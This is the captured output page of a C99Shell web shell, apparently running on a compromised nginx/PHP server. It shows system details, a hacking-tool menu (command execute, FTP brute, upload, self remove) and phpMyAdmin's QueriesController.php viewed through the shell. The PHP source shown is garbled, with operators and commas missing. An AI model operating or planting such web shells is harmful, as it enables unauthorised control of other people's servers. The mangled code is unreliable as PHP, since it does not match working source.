!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/libraries/classes/Controllers/Server/Status/   drwxr-xr-x
Free 83.34 GB of 96.73 GB (86.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     QueriesController.php (3.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Displays query statistics for the server
 */

declare(strict_types=1);

namespace 
PhpMyAdmin\Controllers\Server\Status;

use 
PhpMyAdmin\DatabaseInterface;
use 
PhpMyAdmin\Response;
use 
PhpMyAdmin\Server\Status\Data;
use 
PhpMyAdmin\Template;
use 
PhpMyAdmin\Url;
use function 
array_sum;
use function 
arsort;
use function 
count;
use function 
str_replace;

class 
QueriesController extends AbstractController
{
    
/** @var DatabaseInterface */
    
private $dbi;

    
/**
     * @param Response          $response
     * @param Data              $data
     * @param DatabaseInterface $dbi
     */
    
public function __construct($responseTemplate $template$data$dbi)
    {
        
parent::__construct($response$template$data);
        
$this->dbi $dbi;
    }

    public function 
index(): void
    
{
        global 
$err_url;

        
$err_url Url::getFromRoute('/');

        if (
$this->dbi->isSuperUser()) {
            
$this->dbi->selectDb('mysql');
        }

        
$this->addScriptFiles([
            
'chart.js',
            
'vendor/jqplot/jquery.jqplot.js',
            
'vendor/jqplot/plugins/jqplot.pieRenderer.js',
            
'vendor/jqplot/plugins/jqplot.highlighter.js',
            
'vendor/jqplot/plugins/jqplot.enhancedPieLegendRenderer.js',
            
'vendor/jquery/jquery.tablesorter.js',
            
'server/status/sorter.js',
            
'server/status/queries.js',
        ]);

        if (
$this->data->dataLoaded) {
            
$hourFactor 3600 $this->data->status['Uptime'];
            
$usedQueries $this->data->usedQueries;
            
$totalQueries array_sum($usedQueries);

            
$stats = [
                
'total' => $totalQueries,
                
'per_hour' => $totalQueries $hourFactor,
                
'per_minute' => $totalQueries 60 $this->data->status['Uptime'],
                
'per_second' => $totalQueries $this->data->status['Uptime'],
            ];

            
// reverse sort by value to show most used statements first
            
arsort($usedQueries);

            
$chart = [];
            
$querySum array_sum($usedQueries);
            
$otherSum 0;
            
$queries = [];
            foreach (
$usedQueries as $key => $value) {
                
// For the percentage column, use Questions - Connections, because
                // the number of connections is not an item of the Query types
                // but is included in Questions. Then the total of the percentages is 100.
                
$name str_replace(['Com_''_'], [''' '], $key);
                
// Group together values that make out less than 2% into "Other", but only
                // if we have more than 6 fractions already
                
if ($value $querySum 0.02 && count($chart) > 6) {
                    
$otherSum += $value;
                } else {
                    
$chart[$name] = $value;
                }

                
$queries[$key] = [
                    
'name' => $name,
                    
'value' => $value,
                    
'per_hour' => $value $hourFactor,
                    
'percentage' => $value 100 $totalQueries,
                ];
            }

            if (
$otherSum 0) {
                
$chart[__('Other')] = $otherSum;
            }
        }

        
$this->render('server/status/queries/index', [
            
'is_data_loaded' => $this->data->dataLoaded,
            
'stats' => $stats ?? null,
            
'queries' => $queries ?? [],
            
'chart' => $chart ?? [],
        ]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0049 ]--